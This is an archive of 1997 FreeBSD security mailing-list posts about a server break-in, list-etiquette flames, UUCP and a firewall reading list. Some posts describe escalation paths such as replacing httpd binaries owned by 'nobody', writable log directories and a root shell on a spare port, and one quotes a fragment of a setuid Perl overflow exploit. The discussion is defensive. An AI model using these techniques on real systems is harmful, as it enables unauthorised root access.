22:50:59 -0700 (PDT) Received: from mtvernon1.accessus.net (root@mtvernon1.accessus.net [204.248.93.5]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA05745 for ; Wed, 30 Jul 1997 22:50:43 -0700 (PDT) Received: from localhost (johnnyu@localhost) by mtvernon1.accessus.net (8.8.5/8.7.3) with SMTP id AAA01987 for ; Thu, 31 Jul 1997 00:21:02 -0500 Date: Thu, 31 Jul 1997 00:21:02 -0500 (CDT) From: NoHackMe! To: security@freebsd.org Subject: It's time to end this thread. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Dear subscribers, I am tired of this arrogant attitude that some of the more vocal members have towards Vince. I am a co-admin at Gaianet. As he has stated before we are remote and voluntary. So your rantings and ravings about how we should know this and that are pointless. Vince reached out for help, not out of some lack of initiative, but becuase this list is a resource and as such he was right in posting to it for help. Unfortunately, save a few posts, he was given more attitude and flames than help. As you should all know it is impossible to protect your self from every type of hack, mainly because there are new ones appearing all the time. We subscribe to Bugtraq and try to keep up with the "exploit kiddies" but save that we aren't security experts as some of you tout yourselves to be. If this seems inflamatory good. You can take your "rtfm" and "you should have investigated before posting" and stick it where the sun doesn't shine. In the future if you have nothing to offer aside from those snide "I know more than you, but you should read the manual or spend 10 days trying to figure out how it happened before posting to this list" don't even bother posting. John P.S. These are my opinions and mine alone. From owner-freebsd-security Wed Jul 30 23:18:49 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA07916 for security-outgoing; Wed, 30 Jul 1997 23:18:49 -0700 (PDT) Received: from acromail.ml.org (acroal.vip.best.com [206.86.222.181]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA07897 for ; Wed, 30 Jul 1997 23:18:43 -0700 (PDT) Received: from localhost (kernel@localhost) by acromail.ml.org (8.8.6/8.8.5) with SMTP id XAA00672; Wed, 30 Jul 1997 23:18:59 -0700 (PDT) Date: Wed, 30 Jul 1997 23:18:59 -0700 (PDT) From: FreeBSD Technical Reader To: Ollivier Robert cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <19970728171633.10794@keltia.freenix.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Is it also possible to do this with a raw socket using a custom protocol? On Mon, 28 Jul 1997, Ollivier Robert wrote: > According to Vincent Poy: > > 1) User on mercury machine complained about perl5 not working which was > > perl5.003 since libmalloc lib it was linked to was missing. > > 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 > > and it works. > > I don't think he used perl to hack root unless you kept old versions of > Perl4 and Perl5. The buffer overflows in Perl4 were plugged in May by > Werner. 5.003+ holes are fixed in 5.004 and later. > > > 6) We went to inetd.conf and shut off all daemons except telnetd and > > rebooted and user still can get onto the machine invisibly. > > That shows that he has used a spare port to hook a root shell on. In these > case, "netstat -a" or "lsof -i:TCP" will give you all connections, > including those on which a program is LISTENing to. That way you'll catch > any process left on a port. > > -- > Ollivier ROBERT -=- FreeBSD: There are no limits -=- roberto@keltia.freenix.fr > FreeBSD keltia.freenix.fr 3.0-CURRENT #23: Sun Jul 20 18:10:34 CEST 1997 > From owner-freebsd-security Thu Jul 31 05:26:58 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA03985 for security-outgoing; Thu, 31 Jul 1997 05:26:58 -0700 (PDT) Received: from logic.it (mod8.logic.it [195.120.151.24]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id FAA03884 for ; Thu, 31 Jul 1997 05:26:18 -0700 (PDT) Received: (qmail 627 invoked by uid 1000); 31 Jul 1997 12:25:08 -0000 Date: Thu, 31 Jul 1997 14:25:07 +0200 (MET DST) From: Marco Molteni X-Sender: molter@dumbwinter.ecomotor.it To: security@freebsd.org cc: "\[Mario1-\]" , Jim Shankland , Poul-Henning Kamp , "Jordan K. Hubbard" , Nate Williams , Michael Smith , Gary Clark II , Vincent Poy Subject: Re: security hole in FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I wrote: > No, everybody started to flame at him! because what I didn't understand was the general animosity towards Vincent. I got many replies, all were kind and all asserted the same opinion, which can be summarized by Nate's posting: > From: Nate Williams > To: Marco Molteni > Cc: Vincent Poy , security@freebsd.org, > "[Mario1-]" > Subject: Re: security hole in FreeBSD > > Ahh, but you assume that we haven't ever seen Vinny before. > Unfortunately, his behavior is 'typical', in that he wants us to do all > his research and work for him, rather than him spending the time to do > his own work. He also shows a complete lack of interest in finding out > solutions to his own problems. [..] Yes, exactly, I assumed all the people on the list didn't see Vincent before. Instead, it seems that *all* you met Vincent a long time ago! ;-) I think I simply misunderstood. Never mind! Marco From owner-freebsd-security Thu Jul 31 06:57:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA10467 for security-outgoing; Thu, 31 Jul 1997 06:57:07 -0700 (PDT) Received: from shift-f1.com (shift-f1.com [205.160.29.37]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA10462 for ; Thu, 31 Jul 1997 06:57:04 -0700 (PDT) Received: (from shashi@localhost) by shift-f1.com (8.8.5/8.8.5) id JAA02851; Thu, 31 Jul 1997 09:55:19 -0500 (EST) From: Shashi Joshi Message-Id: <199707311455.JAA02851@shift-f1.com> Subject: Stop this thread NOW unless you have anything for teh group In-Reply-To: from Vincent Poy at "Jul 30, 97 08:28:47 am" To: vince@mail.MCESTATE.COM (Vincent Poy) Date: Thu, 31 Jul 1997 09:55:19 -0500 (EST) Cc: nate@mt.sri.com, molter@logic.it, security@FreeBSD.ORG, mario1@primenet.com X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Hi all, I am including the complete mail here. Will some one please tell me the relevance of this on the mailing list? ANYONE responding to any mail should MAKE CERTAIN it pertains to the group, else please modify the "To: " and "Cc: " fields. It doesn't matter how long you have been a hacker or a sysadmin. It applies to all. That is the basic courtsey a sys-admin should have, right? Else how will you ever handle a mail-mischief? Shashi As Vincent Poy (you? ) said -> > From owner-freebsd-security@FreeBSD.ORG Wed Jul 30 12:02:08 1997 > Date: Wed, 30 Jul 1997 08:28:47 -0700 (PDT) > From: Vincent Poy > To: Nate Williams > cc: Marco Molteni , security@FreeBSD.ORG, > "[Mario1-]" > Subject: Re: security hole in FreeBSD > In-Reply-To: <199707301506.JAA04746@rocky.mt.sri.com> > Message-ID: > Sender: owner-freebsd-security@FreeBSD.ORG > X-Loop: FreeBSD.org > Precedence: bulk > On Wed, 30 Jul 1997, Nate Williams wrote: > > =)> =)Ahh, but you assume that we haven't ever seen Vinny before. > =)> =)Unfortunately, his behavior is 'typical', in that he wants us to do all > =)> =)his research and work for him, rather than him spending the time to do > =)> =)his own work. He also shows a complete lack of interest in finding out > =)> =)solutions to his own problems. > =)> > =)> I have tried reading the docs and it sometimes fails so what would > =)> you do? > =) > =)What docs have you read? What books have you read? > > The docs that came with the product. As for books, I don't have > that much time to go through reading books because by the time I finish > reading it, it'll be too late. > > =)> Since when have you dealt with me too many times over the last 2 > =)> years, you have helped me exactly twice. > =) > =)Do you want me to drag out my archives and prove you wrong? > =) > =)> flaming. Most of the people here have more resources than I would which > =)> is $$$ since remember I don't get paid to do this sysadmin stuff > =) > =)*SO WHAT*. Do you think I get paid to answer you? Do you think I've > =)ever got paid to do any FreeBSD hacking? It's irrelevant. I'm not the > =)person who claims he can read a 500 works/minutes, and who needs no > =)sleep at night, and who also 'must have missed all 12 emails discussing > =)the same problem in the mailing lists, even though I do read the lists'. > > I know you don't get paid to answer me but no one pointed a gun to > your head and made you answer every question I ask. I never claimed I can > read 500 words a minute. I did say I need no sleep at night but do > remember, I am still in school so FreeBSD isn't my only thing. And it > wouldn't be weird if I missed a whole thread since sometimes when the > owners are on vacation, the bbs machine which I have no control of crashes > and the mail backlogs on the machine I read the mailing list on crashes > too and not until 10 days later, will the machines be back back up. And > when I resubscribe again which I did atleast 10-20 times just this year > alone, I would miss out on parts of the discussion. > > =)You don't learn from anything *but* your own mistakes, and then don't > =)try to come up with solutions, but rely on someone else to provide them > =)for you. > > I know I wouldn't learn from anything but my own mistakes since if > certain things are not in the docs, I would need to ask. > > =)> and even > =)> for the router, you are there physically, I am not so I need to verify > =)> things before doing it as a precaution. I don't think you or anyone else > =)> here never asked for help from others before. > =) > =)That's because I and most of the other folks do their research *first*, > =)and then ask questions. You continue to whine and complain and show a > =)complaint lack of interest in figuring out the solution, and would > =)rather have someone spoon-feed you the steps in an easy to do solution > > You're still forgetting the fact that when you are physically > there next to the router machine, it's a night and day difference in > figuring things out. But when it's like totally remote, then you do need > to verify things first instead of totally screwing it up. Besides, for > the serial card, I asked if I had the configuration settings correct and > you did post a configuration of yours which worked but when we tried it > didn't. And this problem was never covered in the docs. Somehow for > whatever reason, the FreeBSD machine would not see the CSU/DSU unless > either it was power toggled on/off or we had to issue a few linkup > commands in the script. Sorry about that one since I wasn't physically > there so I thought it might have been my misconfiguration. > > =)Unfortunately, there ain't 'system administration for dummies', because > =)because a sys-ad requires a broad-base of knowledge, and you with all > =)your supposed talents don't take the time to do a good job. > > I'm trying to do my best at it but the problem is there is only so > many hours per day and I can't just drop the entire project and go read > books and stuff when the book might not even cover it. > > =)One thing that my family has taught me is that you end up with better > =)jobs by going out of your way to do your current job well. By sitting > =)on your duff and relying on people to tell you what to do, you'll never > =)get ahead in life. I only wish you could understand this advice, and > =)actually apply it. > > I'll try but with this security incident, it's different because > all three of us went into panic since if we had access to the machine now, > we would be able to atleast find things. I guess what I need to do is > find the time to start reading things but I don't know where to start > since things in the computer area become obselete so fast these days > anyways. > > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > -- Shashi Joshi From owner-freebsd-security Thu Jul 31 08:24:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA15087 for security-outgoing; Thu, 31 Jul 1997 08:24:55 -0700 (PDT) Received: from grendel.IAEhv.nl (grendel.IAEhv.nl [194.151.72.15]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA15051 for ; Thu, 31 Jul 1997 08:24:28 -0700 (PDT) Received: (from peter@localhost) by grendel.IAEhv.nl (8.8.5/8.8.5) id BAA00810; Thu, 31 Jul 1997 01:43:54 +0200 (CEST) Message-ID: <19970731014354.30839@grendel.IAEhv.nl> Date: Thu, 31 Jul 1997 01:43:54 +0200 From: Peter Korsten To: security@FreeBSD.ORG Subject: Re: Keep UUCP (Was: Re: security hole in FreeBSD) References: <3.0.32.19970730223202.0070ef8c@student.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67e In-Reply-To: ; from Jay D. Nelson on Wed, Jul 30, 1997 at 03:52:38PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Jay D. Nelson shared with us: > Sometimes I think we can be too "internet-centric" for our own > good. UUCP makes good security and economic sense. > > [lotsa points deleted] > > Make it an install option if you want, but leave it as a part of the > standard distribution. I can only agree with this. As long as queued SMTP isn't commonly used, keep UUCP. (And then there's the News thing, too.) I have a rather complicated mail setup, with filters that delete, refuse, save in a folder or resend mail to my UUCP node according to a set of rules. To do it without UUCP would be inconvenient, to put it mildly. For a non-connected host, who wants to use standard mailers like Mutt or Elm, there's no real alternative. - Peter From owner-freebsd-security Thu Jul 31 09:06:43 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA17441 for security-outgoing; Thu, 31 Jul 1997 09:06:43 -0700 (PDT) Received: from yoss.canweb.net (root@yoss.canweb.net [207.139.235.8]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA17434 for ; Thu, 31 Jul 1997 09:06:38 -0700 (PDT) Received: from localhost (yossman@localhost) by yoss.canweb.net (8.8.5/8.8.5) with SMTP id MAA11987; Thu, 31 Jul 1997 12:00:31 -0400 (EDT) Date: Thu, 31 Jul 1997 12:00:31 -0400 (EDT) From: yossman To: sthaug@nethelp.no cc: pechter@lakewood.com, adam@homeport.org, freebsd-security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <4202.870208785@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997 sthaug@nethelp.no wrote: > I like the FreeBSD distributions - but I would be much happier if there > was an easy way to make a system more secure. For instance a document > which told you: > > - These files are only necessary if you need functionality X (uucp is > an example here). If you don't need functionality X, they can be safely > removed. [...] i would be VERY happy if such a document was released and was reasonably complete. setting up a new unix machine takes me at least a week of futzing around with security-related issues before i'm satisfied it's ready to be used with some assurance it's not going to be easily broken. having such a document as an additional information source would be awesome. yossman ------------------------------------------------------------------------ Yossarian Holmberg (yossman) yossman@canweb.net System Administrator, National Online http://www.canweb.net/~yossman/ my statements are my own, not my employer's -- i do not speak for them. '... and if i die, before i learn to speak .. can money pay for all the days i've lived awake but half asleep?' -- Primitive Radio Gods, "Standing Outside a Broken Phone Booth With Money In My Hand" From owner-freebsd-security Thu Jul 31 09:23:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA18176 for security-outgoing; Thu, 31 Jul 1997 09:23:56 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA18171 for ; Thu, 31 Jul 1997 09:23:49 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id MAA27641; Thu, 31 Jul 1997 12:20:04 -0400 (EDT) From: Adam Shostack Message-Id: <199707311620.MAA27641@homeport.org> Subject: Re: security hole in FreeBSD In-Reply-To: <199707310301.MAA25307@genesis.atrad.adelaide.edu.au> from Michael Smith at "Jul 31, 97 12:31:46 pm" To: msmith@atrad.adelaide.edu.au (Michael Smith) Date: Thu, 31 Jul 1997 12:20:04 -0400 (EDT) Cc: gilbertp@videotron.com, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Michael Smith wrote: | Patrick Gilbert stands accused of saying: | > | > After a brief discussion with TheCa on Efnet, he dcc'd me his famous | > exploit for a transcript of | > his brief moment of fame on this discussion list. | | Oh, what a d00d. | | > execl("/usr/bin/sperl5.00403", | > "/usr/bin/sperl5.00403", buf, NULL); | > } | | This looks like a Linux exploit; there is no Perl5 in the FreeBSD tree, and | if it were installed from the port/package it would be in /usr/local/bin. This looks to me like a PERL5.004 exploit, not a linux exploit. Its just that the egg is the linux egg, not the FreeBSD egg. The egg code (nicely commented!) can be found in Leshka Zakharoff's ppp or cron overflows. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Thu Jul 31 10:59:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA23263 for security-outgoing; Thu, 31 Jul 1997 10:59:56 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA23254 for ; Thu, 31 Jul 1997 10:59:52 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.8.5/8.8.5) with UUCP id LAA17808; Thu, 31 Jul 1997 11:59:20 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with SMTP id MAA27798; Thu, 31 Jul 1997 12:00:17 -0600 (MDT) Date: Thu, 31 Jul 1997 12:00:17 -0600 (MDT) From: Marc Slemko To: Shashi Joshi cc: security@FreeBSD.ORG Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301450.JAA25877@shift-f1.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Shashi Joshi wrote: > Now why would sendmail be in sbin when it is not purely a sysadmin tool > only? Because sbin is not for sysadmin tools. man hier Followups are probably best directed to chat. From owner-freebsd-security Thu Jul 31 11:30:06 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA24775 for security-outgoing; Thu, 31 Jul 1997 11:30:06 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA24769 for ; Thu, 31 Jul 1997 11:30:04 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.8.5/8.8.5) with UUCP id MAA19733 for security@FreeBSD.ORG; Thu, 31 Jul 1997 12:30:03 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with SMTP id MAA27936 for ; Thu, 31 Jul 1997 12:24:06 -0600 (MDT) Date: Thu, 31 Jul 1997 12:24:06 -0600 (MDT) From: Marc Slemko To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk (no, it isn't particularily FreeBSD related but at least it is security...) On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: > There IS one common hole I've seen apache and stronghold have, and that is More accurately, there is a common hole you have seen people have with their installations. > that some people like to leave their sessiond or httpd files owned by > 'nobody'. This allows somebody running CGI on that system to replace > those binaries with their own, hacked binaries (since the scripts are > usually owned as nobody), and the next time httpd starts, they can make it > write a root shell, or just about anything along those lines. Presuming you start the server as root and have it run as a different user, one other thing to note is to be sure that the directory your log files are in is not writable by anyone you don't trust with root. If someone can write to the directory with the logfile in (or any directory above it), they can almost certainly get root. The log files themself can be writable by whoever you want (although there is no reason for them to be, and it can let people tamper with them); the directory is the thing that is important. From owner-freebsd-security Thu Jul 31 11:59:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA26536 for security-outgoing; Thu, 31 Jul 1997 11:59:55 -0700 (PDT) Received: from mercury.acs.unt.edu (mercury.acs.unt.edu [129.120.1.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA26530 for ; Thu, 31 Jul 1997 11:59:52 -0700 (PDT) Received: from silo.csci.unt.edu (silo.csci.unt.edu [129.120.3.15]) by mercury.acs.unt.edu (8.8.5/8.8.5) with ESMTP id NAA03008 for ; Thu, 31 Jul 1997 13:59:32 -0500 (CDT) Received: from localhost (webb@localhost) by silo.csci.unt.edu (8.8.4/8.8.4) with SMTP id NAA16283 for ; Thu, 31 Jul 1997 13:59:31 -0500 (CDT) Date: Thu, 31 Jul 1997 13:59:31 -0500 (CDT) From: Michael Ray Webb To: security@FREEBSD.org Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FREEBSD.org X-Loop: FreeBSD.org Precedence: bulk unsubsribe From owner-freebsd-security Thu Jul 31 13:15:47 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA00569 for security-outgoing; Thu, 31 Jul 1997 13:15:47 -0700 (PDT) Received: from firewall.ftf.dk (root@[129.142.64.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA00558 for ; Thu, 31 Jul 1997 13:15:40 -0700 (PDT) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id WAA29692 for ; Thu, 31 Jul 1997 22:40:20 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id WAA03111 for ; Thu, 31 Jul 1997 22:15:25 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.5/8.8.5/prosa-1.1) id WAA12502; Thu, 31 Jul 1997 22:14:45 +0200 (CEST) Message-ID: <19970731221445.04992@deepo.prosa.dk> Date: Thu, 31 Jul 1997 22:14:45 +0200 From: Philippe Regnauld To: freebsd-security@freebsd.org Subject: Security books (was: Re: So, lets have a checklist compiled (was Re: Security hole) References: <199707301450.JAA25877@shift-f1.com> <14982.870304022@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Content-Description: Main Body X-Mailer: Mutt 0.69 In-Reply-To: <14982.870304022@time.cdrom.com>; from Jordan K. Hubbard on Wed, Jul 30, 1997 at 04:07:02PM -0700 X-Operating-System: FreeBSD 2.2.1-RELEASE i386 Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Jordan K. Hubbard writes: > > The body of available UNIX documentation out there, much of which is > listed in the glossary of the FreeBSD handbook, is about as good as it > gets and it isn't all that bad - even as complete a "checklist" as I > could imagine would end up being largely replicating the docs which > these books currently provide. Books have been mentioned several times -- I can only agree with Jordan and say "read 'em" -- so here's a list that's just been forwarded to me from osiris@pacificnet.net (cf. Bugtraq and BoS) -- hey, Vinnie, read up :-) Internet Firewalls and Network Security. Chris Hare, Karanjit Siyan. 2nd Edition. New Riders Pub. August 1,1996. ISBN: 1562056328 Internet Firewalls. Scott Fuller, Kevin Pagan. Ventana Communications Group Inc. January 1997. ISBN: 1566045061 Building Internet Firewalls. D. Brent Chapman, Elizabeth D. Zwicky. O'Reilly & Associates (ORA). September 1,1995. ISBN: 1565921240 Firewalls and Internet Security : Repelling the Wily Hacker. Addison-Wesley Professional Computing. William R. Cheswick, Steven M. Bellovin. June 1,1994. ISBN: 0201633574 Actually Useful Internet Security Techniques. Larry J. Hughes, Jr. New Riders Publishing, ISBN 1-56205-508-9 PCWEEK Intranet and Internet Firewall Strategies. Ed Amoroso & Ron Sharp, Ziff Davies Internet Security Resource Library : Internet Firewalls and Network Security, Internet Security Techniques, Implementing Internet Security. New Riders. December 1995. ISBN: 1562055062 Firewalls FAQ. Marcus J. Ranum. http://www.cis.ohio-state.edu/hypertext/faq/usenet/firewalls-faq/faq.html NCSA Firewall Policy Guide. Compiled by Stephen Cobb, Director of Special Projects. National Computer Security Association. http://www.ncsa.com/fwpg_p1.html Comparison: Firewalls. June 17, 1996. LanTimes. Comprehensive comparison of a wide variety of firewall products. http://www.lantimes.com/lantimes/usetech/compare/pcfirewl.html There Be Dragons. Steven M. Bellovin. "To appear in Proceedings of the Third Usenix UNIX Security Symposium, Baltimore, September 1992." AT&T Bell Laboratories, Murray Hill, NJ. August 15, 1992 Rating of application layer proxies. Michael Richardson. Wed Nov 13 13:54:09 EST 1996. http://www.sandelman.ottawa.on.ca/SSW/proxyrating/proxyrating.html Keeping your site comfortably secure: An Introduction to Internet Firewalls. John P. Wack and Lisa J. Carnahan. National Institute ofStandards and Technology. John Wack Thursday, Feb 9 18:17:09 EST 1995. http://csrc.ncsl.nist.gov/nistpubs/800-10/ SQL*Net and Firewalls. David Sidwell & Oracle Corporation. http://www.zeuros.co.uk/firewall/library/oracle-and-fw.pdf Covert Channels in the TCP/IP Protocol Suite. Craig Rowland. Rotherwick & Psionics Software Systems Inc. http://www.zeuros.co.uk/firewall/papers.htm If You Can Reach Them, They Can Reach You. A PC Week Online Special Report, June 19, 1995. William Dutcher. http://www.pcweek.com/sr/0619/tfire.html Packet Filtering for Firewall Systems. February 1995. CERT (and Carnegie Mellon University.) ftp://info.cert.org/pub/tech_tips/packet_filtering Network Firewalls. Steven M. Bellovin and William R. Cheswick. ieeecm, 32(9), pp. 50-57, September 1994. Session-Layer Encryption. Matt Blaze and Steve Bellovin. Proceedings of the USENIX Security Workshop, June 1995. A Network Perimeter With Secure External Access. An extraordinary paper that details the implementation of a firewall purportedly at the White House. (Yes, the one at 1600 Pennsylvania Avenue.) Frederick M. Avolio; Marcus J. Ranum. (Trusted Information Systems, Incorporated). Glenwood, MD. January 25, 1994. http://www.alw.nih.gov/Security/FIRST/papers/firewall/isoc94.ps Packets Found on an Internet. Interesting Analysis of packets appearing at the Application Gateway of AT&T. Steven M. Bellovin. Lambda. August 23, 1993. ftp://ftp.research.att.com/dist/smb/packets.ps Using Screend to implement TCP/IP Security Policies. Jeff Mogul. Rotherwick and Digital. http://www.zeuros.co.uk/firewall/library/screend.ps Firewall Application Notes. Good document that starts out by describing how to build a firewall. It also addresses application proxies, Sendmail in relation to firewalls and the characteristics of a bastion host. Livingston Enterprises, Inc. http://www.telstra.com.au/pub/docs/security/firewall-1.1.ps.Z X Through the Firewall, and Other Application Relays. Treese/Wolman Digital Equipment Corp. Cambridge Research Lab. (October, 1993?). ftp://crl.dec.com/pub/DEC/CRL/tech-reports/93.10.ps.Z Intrusion Protection for Networks 171. BYTE Magazine. April, 1995. Benchmarking Methodology for Network Interconnect Devices. RFC 1944. S. Bradner & J. McQuaid. ftp://ds.internic.net/rfc/rfc1944.txt Firewall Performance Measurement Techniques: A Scientific Approach. Marcus Ranum. February 4, 1996 (Last Known Date of Mod.) http://www.v-one.com/pubs/perf/approaches.htm WARDING OFF THE CYBERSPACE INVADERS. Business Week. 03/13/95. Amy Cortese in New York, with bureau reports Vulnerability in Cisco Routers used as Firewalls. Computer Incident Advisory Capability Advisory: Number D-15. May 12, 1993 1500 PDT. http://ciac.llnl.gov/ciac/bulletins/d-15.shtml WAN-Hacking with AutoHack - Auditing Security behind the Firewall. Alec D.E. Muffett. (network Security Group, Sun Microsystems, United Kingdom.) Written by the author of Crack, the famous password cracking program. Extraordinary document that deals with methods of auditing security from behind a firewall. (And auditing of a network so large that it contained tens of thousands of hosts!) June 6, 1995. http://www.telstra.com.au/pub/docs/security/muffett-autohack.ps Windows NT Firewalls Are Born. February 4, 1997. PC Magazine. http://www.pcmagazine.com/features/firewall/_open.htm Group of 15 Firewalls Hold Up Under Security Scrutiny. Stephen Lawson June 1996. InfoWorld. http://www.infoworld.com/cgi-bin/displayStory.pl?96067.firewall.htm IP v6 Release and Firewalls. Uwe Ellermann. 14th Worldwide Congress on Computer and Communications Security. Protection, pp. 341-354, June 1996. The SunScreen Product Line Overview. (Sun Microsystems.) http://www.sun.com/security/overview.html Product Overview for IBM Internet Connection Secured Network Gateway for AIX, Version 2.2. (IBM Firewall Information.) http://www.ics.raleigh.ibm.com/firewall/overview.htm The Eagle Firewall Family. (Raptor Firewall Information.) http://www.raptor.com/products/brochure/40broch.html Secure Computing Firewall™ for NT. Overview. (Secure Computing). http://www.sctc.com/NT/HTML/overview.html Check Point FireWall-1 Introduction. (Checkpoint Technologies Firewall Information.) http://www.checkpoint.com/products/firewall/intro.html Cisco PIX Firewall. (Cisco Systems Firewall Information.) http://www.cisco.com/univercd/data/doc/cintrnet/prod_cat/pcpix.htm Protecting the Fortress From Within and Without. R. Scott Raynovich. April 1996. LAN Times. http://www.wcmh.com/lantimes/96apr/604c051a.html Internet Firewalls: An Introduction. Firewall White Paper. NMI Internet Expert Services. PO Box 8258. Portland, ME 04104-8258. http://www.netmaine.com/netmaine/whitepaper.html Features of the Centri(TM) Firewall. (Centri Firewall Information.) http://www.gi.net/security/centrifirewall/features.html Five Reasons Why an Application Gateway is the Most Secure Firewall. (Global Internet.) http://www.gi.net/security/centrifirewall/fivereasons.html An Introduction to Intrusion Detection. Aurobindo Sundaram. Last Apparent Date of Modification: October 26, 1996. http://www.techmanager.com/nov96/intrus.html Intrusion Detection for Network Infrastructures. S. Cheung, K.N. Levitt, C. Ko. 1995 IEEE Symposium on Security and Privacy, Oakland, CA, May 1995. http://seclab.cs.ucdavis.edu/papers/clk95.ps Network Intrusion Detection. Biswanath Mukherjee and L. Todd Heberlein and Karl N. Levitt. IEEE Network, May 1994. Fraud and Intrusion Detection in Financial Information Systems. S. Stolfo and P. Chan and D. Wei and W. Lee and A. Prodromidis. 4th ACM Computer and Communications Security Conference, 1997. http://www.cs.columbia.edu/~sal/hpapers/acmpaper.ps.gz A Pattern-Oriented Intrusion-Detection Model and Its Applications. Shiuhpyng W. Shieh and Virgil D. Gligor. Research in Security and Privacy, IEEECSP, May 1991. Detecting Unusual Program Behavior Using the Statistical Component of the Next-generation Intrusion Detection Expert System (NIDES). Debra Anderson, Teresa F. Lunt, Harold Javitz, Ann Tamaru, and Alfonso Valdes. SRI-CSL-95-06, May 1995. (Available in hard copy only.) Abstract: http://www.csl.sri.com/tr-abstracts.html#csl9506 Intrusion Detection Systems (IDS): A Survey of Existing Systems and A Proposed Distributed IDS Architecture. S.R. Snapp, J. Brentano, G.V. Dias, T.L. Goan, T. Grance, L.T. Heberlein, C. Ho, K.N. Levitt, B. Mukherjee, D.L. Mansur, K.L. Pon, and S.E. Smaha. Technical Report CSE-91-7, Division of Computer Science, University of California, Davis, February 1991. 